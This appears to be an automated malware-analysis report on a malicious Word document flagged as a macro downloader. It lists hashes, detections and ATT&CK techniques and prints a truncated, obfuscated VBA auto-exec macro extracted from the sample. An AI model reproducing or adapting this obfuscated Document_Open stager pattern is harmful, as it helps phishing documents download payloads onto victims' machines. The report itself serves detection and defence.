Office (OLE) malware analysis — malicious · 370afbfc36044c2c

MALICIOUS

Office (OLE)

199.6 KB Created: 2019-12-19 01:42:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 2b44ec3d6c0940b3038950038be745db SHA-1: 7c9a2b62384020f470c9ec5a57786810270a4a7e SHA-256: 370afbfc36044c2ca0cf729e11381e633617f4a67e0a3c88ebe4a1959a991c33

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of a downloader. The ClamAV detection 'Doc.Downloader.Sagent-7465099-0' further supports this. The primary function appears to be executing obfuscated VBA code that likely downloads and executes a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Sagent-7465099-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-7465099-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11036 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11036 bytes
SHA-256: `a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Bhhujcbq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox" Private Sub Document_open() Wqhxgpmwiqeve = Xbbotshmi Vqsdhzec = 396 Oabjzfnve = ("Eos.") Ueivmgxho = (656) Dim Getvdfjfrbwzj As String Dim Ftnurdovblkhv As Boolean Dim Vneptxpeb As Integer Dim Zlfyfyvmbd As Boolean Dim Murjsktxomjg As Integer Dim Uhcppmnfedqc As Integer Dim Mirdburubo As Boolean Hjxnbypjenkm = (583) Dim Ghqnsqdil As Boolean Gfodafnsvedh = ("Est tempora recusandae.") Rmwgyyfo = (909) Dim Jenvgqyystu As String Feiwttcc = Lbdhbngorlatv Leffoxhylqcq = Vqljecudjx Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas." Lbddsqzxecwup = 293 Rnjpdlae = Vnsbliid Wavrxtqcsvtq = 61 Fnpnynpxyb = ("Amelia") Byrvyori = (925) Dim Ssskuxmtkfr As Integer Dim Ysvelcyctcvr As String Dim Wxeznfpvxv As Double Dim Rkeqjjvdtccj As Boolean Dim Ioyqwtdmq As String Dim Geagdvaqt As String Dim Ycsmvoruvvt As String Bwgyuoeuildfv = (180) Dim Gcsmvuqwxkx As Integer Vaknwdegpbve = ("Earum.") Prohaqansdgm = (320) Dim Aioxzjyibq As Boolean Sjrbwhpaaej = Yvihggjatggmy Uhqyyjyqvrgzx = Vzlaaoqauk Ydloycsgtok = "Iste rerum adipisci fuga." Aenqahmzjlg = 172 Xbsfnwonrotla = Kttpxxvjlnj Yuteibyzsgn = 967 Rztfitowi = ("Est.") Ktccsgrehypxv = (521) Dim Yrrrmfbq As Boolean Dim Pgfpatpmuuozw As String Dim Pjghccyqeu As Boolean Dim Qvticvfca As Integer Dim Hfzkavpzukf As Boolean Dim Vjeurqavdnzr As String Dim Ldqeldvzcc As Double Upucvkyyntrll = (134) Dim Sdratzjdwd As String Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.") Cyrlftbrcvkc = (913) Dim Llyyqqexrnqis As Double Sbzlaxlm = Ltbyavyeukybd Oegevxalrjtlr = Zzoaewdz Rdxfcqyxmlsf = "Sit blanditiis ducimus." Akhkogkhgtk = 61 Pihlzkcicga End Sub Attribute VB_Name = "Vyeoqakxxt" Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Oinarhrpwwxy" Function Ujjteelnxf() Iczpkrbxsfrj = Cboniugn Rdyqpfkuf = 738 Pxftmuoc = ("Alton") Hogqsoqjmou = (794) Dim Xhskinuxeham As Double Dim Tvzrlcqkor As Integer Dim Rtktripehmtjf As Boolean Dim Sdhfdoewn As Boolean Dim Jxcmsakmvanlq As Integer Dim Abhcpmvwyhhmw As Boolean Dim Wwgtysbuts As Boolean Uferrmhodplx = (504) Dim Bdfloneidre As Integer Eygnjptbqtpq = ("Ellen") Ujhkjjkqyph = (261) Dim Plbnmvscqw As Double Hrmkkpvp = Zwgvmknzrf Eqpgcugm = Ficsxgozmon Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim." Wvdnailglrx = 453 Ewajapcv = Bhhujcbq.Guqlecwzw Gwfxeyindhu = Noolpphajhbdh Vtwkoathq = 631 Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.") Vthomxoeuw = (498) Dim Sjkkfyug As Integer Dim Hpnadtopuvli As Double Dim Caovtmzm As Double Dim Hwdbioinodm As Boolean Dim Luvpebes As String Dim Iifkznlrvo As Boolean Dim Gqnhgmyuupjz As Double Xwvkwyyl = (318) Dim Cejzdlrdetne As Integer Vrupqsyghypow = ("Alberto") Yuvvuebdyqiy = (701) Dim Jmtuypfdiubu As Double Lkppglfysjist = Zitslylwuyvn Btzifsobts = Kujmfwrijmi Yanurlxkmq = "Vitae." Knvhypbxvn = 938 Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn Izugkvgxkaej = Fnonjqyisl Ksmawuuv = 791 Xbrvovzmbpv = ("Alison") Uokrwuah = (570) Dim Kknljdjpepqpm As Double Dim Bcigksexrrm As String Dim Xbthodhk As Boolean Dim Qiraqxlebo As Integer Dim Srayffnwtxqg As Boolean Dim Wjbioczs As Boolean Dim Ssnzgnkyycjbg As Boolean Bxfqsskjnbbdt = (380) Dim Vzydgmro As Integer Nshouudlj = ("Leo") Ubafhjaxe = (969) Dim Yxhjcdjmjjp As Integer Adutgyrjm = Xyxydrql Tkgkrabxdwfrv ... (truncated)

SHA-256: a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Bhhujcbq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Ueivmgxho = (656)
Dim Getvdfjfrbwzj As String
Dim Ftnurdovblkhv As Boolean
Dim Vneptxpeb As Integer
Dim Zlfyfyvmbd As Boolean
Dim Murjsktxomjg As Integer
Dim Uhcppmnfedqc As Integer
Dim Mirdburubo As Boolean
Hjxnbypjenkm = (583)
Dim Ghqnsqdil As Boolean
Gfodafnsvedh = ("Est tempora recusandae.")
Rmwgyyfo = (909)
Dim Jenvgqyystu As String
Feiwttcc = Lbdhbngorlatv
Leffoxhylqcq = Vqljecudjx
Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas."
Lbddsqzxecwup = 293
   Rnjpdlae = Vnsbliid
Wavrxtqcsvtq = 61
Fnpnynpxyb = ("Amelia")
Byrvyori = (925)
Dim Ssskuxmtkfr As Integer
Dim Ysvelcyctcvr As String
Dim Wxeznfpvxv As Double
Dim Rkeqjjvdtccj As Boolean
Dim Ioyqwtdmq As String
Dim Geagdvaqt As String
Dim Ycsmvoruvvt As String
Bwgyuoeuildfv = (180)
Dim Gcsmvuqwxkx As Integer
Vaknwdegpbve = ("Earum.")
Prohaqansdgm = (320)
Dim Aioxzjyibq As Boolean
Sjrbwhpaaej = Yvihggjatggmy
Uhqyyjyqvrgzx = Vzlaaoqauk
Ydloycsgtok = "Iste rerum adipisci fuga."
Aenqahmzjlg = 172
   Xbsfnwonrotla = Kttpxxvjlnj
Yuteibyzsgn = 967
Rztfitowi = ("Est.")
Ktccsgrehypxv = (521)
Dim Yrrrmfbq As Boolean
Dim Pgfpatpmuuozw As String
Dim Pjghccyqeu As Boolean
Dim Qvticvfca As Integer
Dim Hfzkavpzukf As Boolean
Dim Vjeurqavdnzr As String
Dim Ldqeldvzcc As Double
Upucvkyyntrll = (134)
Dim Sdratzjdwd As String
Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.")
Cyrlftbrcvkc = (913)
Dim Llyyqqexrnqis As Double
Sbzlaxlm = Ltbyavyeukybd
Oegevxalrjtlr = Zzoaewdz
Rdxfcqyxmlsf = "Sit blanditiis ducimus."
Akhkogkhgtk = 61
Pihlzkcicga
End Sub

Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
   Iczpkrbxsfrj = Cboniugn
Rdyqpfkuf = 738
Pxftmuoc = ("Alton")
Hogqsoqjmou = (794)
Dim Xhskinuxeham As Double
Dim Tvzrlcqkor As Integer
Dim Rtktripehmtjf As Boolean
Dim Sdhfdoewn As Boolean
Dim Jxcmsakmvanlq As Integer
Dim Abhcpmvwyhhmw As Boolean
Dim Wwgtysbuts As Boolean
Uferrmhodplx = (504)
Dim Bdfloneidre As Integer
Eygnjptbqtpq = ("Ellen")
Ujhkjjkqyph = (261)
Dim Plbnmvscqw As Double
Hrmkkpvp = Zwgvmknzrf
Eqpgcugm = Ficsxgozmon
Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim."
Wvdnailglrx = 453
Ewajapcv = Bhhujcbq.Guqlecwzw
   Gwfxeyindhu = Noolpphajhbdh
Vtwkoathq = 631
Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.")
Vthomxoeuw = (498)
Dim Sjkkfyug As Integer
Dim Hpnadtopuvli As Double
Dim Caovtmzm As Double
Dim Hwdbioinodm As Boolean
Dim Luvpebes As String
Dim Iifkznlrvo As Boolean
Dim Gqnhgmyuupjz As Double
Xwvkwyyl = (318)
Dim Cejzdlrdetne As Integer
Vrupqsyghypow = ("Alberto")
Yuvvuebdyqiy = (701)
Dim Jmtuypfdiubu As Double
Lkppglfysjist = Zitslylwuyvn
Btzifsobts = Kujmfwrijmi
Yanurlxkmq = "Vitae."
Knvhypbxvn = 938
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
   Izugkvgxkaej = Fnonjqyisl
Ksmawuuv = 791
Xbrvovzmbpv = ("Alison")
Uokrwuah = (570)
Dim Kknljdjpepqpm As Double
Dim Bcigksexrrm As String
Dim Xbthodhk As Boolean
Dim Qiraqxlebo As Integer
Dim Srayffnwtxqg As Boolean
Dim Wjbioczs As Boolean
Dim Ssnzgnkyycjbg As Boolean
Bxfqsskjnbbdt = (380)
Dim Vzydgmro As Integer
Nshouudlj = ("Leo")
Ubafhjaxe = (969)
Dim Yxhjcdjmjjp As Integer
Adutgyrjm = Xyxydrql
Tkgkrabxdwfrv 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.